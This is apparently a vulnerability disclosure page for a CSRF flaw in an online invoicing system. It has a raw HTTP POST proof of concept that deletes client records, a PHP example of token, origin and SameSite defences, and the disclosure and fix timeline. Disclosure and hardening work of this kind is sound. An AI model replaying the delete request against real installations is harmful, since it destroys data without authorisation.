Cross-Site Request Forgery (CSRF) in bigprof-software/online-invoicing-system

Valid

Reported on

Aug 4th 2021


✍️ Description

CSRF vulnerability that allows an attacker to mass-delete client records.

🕵️‍♂️ Proof of Concept

The request below is vulnerable to CSRF. There is no CSRF token check and no Referer check; nothing prevents a cross-site request from triggering the delete.

POST /online-invoicing-system/app/clients_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://localhost
Connection: close
Referer: http://localhost/online-invoicing-system/app/clients_view.php

delete_x=1&SelectedID=1
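For defenders, the following shows how a delete handler of this shape can be guarded with a session-bound CSRF token, a constant-time comparison, an Origin/Referer check and a SameSite session cookie. This is an added example written for this page, not the project's own code and not the fix from commit 7e5f4d; the function names `csrf_token`, `csrf_token_valid` and `origin_allowed`, and the `csrf_token` form field and `X-CSRF-Token` header names, are assumptions made for the illustration.

```php
<?php
// Added example (not the project's code): CSRF guard for a delete handler.
// Function names and the csrf_token field / X-CSRF-Token header are assumptions.
declare(strict_types=1);

// SameSite=Lax makes browsers omit the session cookie on cross-site POSTs.
// This is defence in depth only; the token check below is still required.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'secure'   => isset($_SERVER['HTTPS']),
]);
session_start();

// Issue one unpredictable token per session; forms and XHR calls echo it back.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_token_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Second check: Origin (or, failing that, Referer) must name our own host.
// A request carrying neither header is rejected rather than waved through.
function origin_allowed(string $expectedHostPort): bool
{
    $src   = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    $parts = parse_url($src);
    if (!is_array($parts) || empty($parts['host'])) {
        return false;
    }
    $hostPort = $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
    return strcasecmp($hostPort, $expectedHostPort) === 0;
}

// Delete handler: every state-changing request must pass both checks.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete_x'])) {
    $token = $_POST['csrf_token'] ?? $_SERVER['HTTP_X_CSRF_TOKEN'] ?? null;
    if (!csrf_token_valid($token) || !origin_allowed($_SERVER['HTTP_HOST'])) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    $id = (int) ($_POST['SelectedID'] ?? 0);
    // ... perform the delete for $id here ...
}
?>
<!-- Forms carry the token as a hidden field; XHR calls may send X-CSRF-Token. -->
<form method="post" action="clients_view.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="hidden" name="SelectedID" value="1">
  <button name="delete_x" value="1">Delete</button>
</form>
```

With this in place the captured request above is refused with a 403 because it carries no `csrf_token` field and no `X-CSRF-Token` header, while the origin check rejects a POST whose Origin or Referer points at another site even if a token were guessed.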

💥 Impact

CSRF leading to unauthorised deletion of client records.

We have contacted a member of the bigprof-software/online-invoicing-system team and are waiting to hear back 2 years ago
BigProf Software validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software marked this as fixed with commit 7e5f4d 2 years ago
BigProf Software has been awarded the fix bounty
This vulnerability will not receive a CVE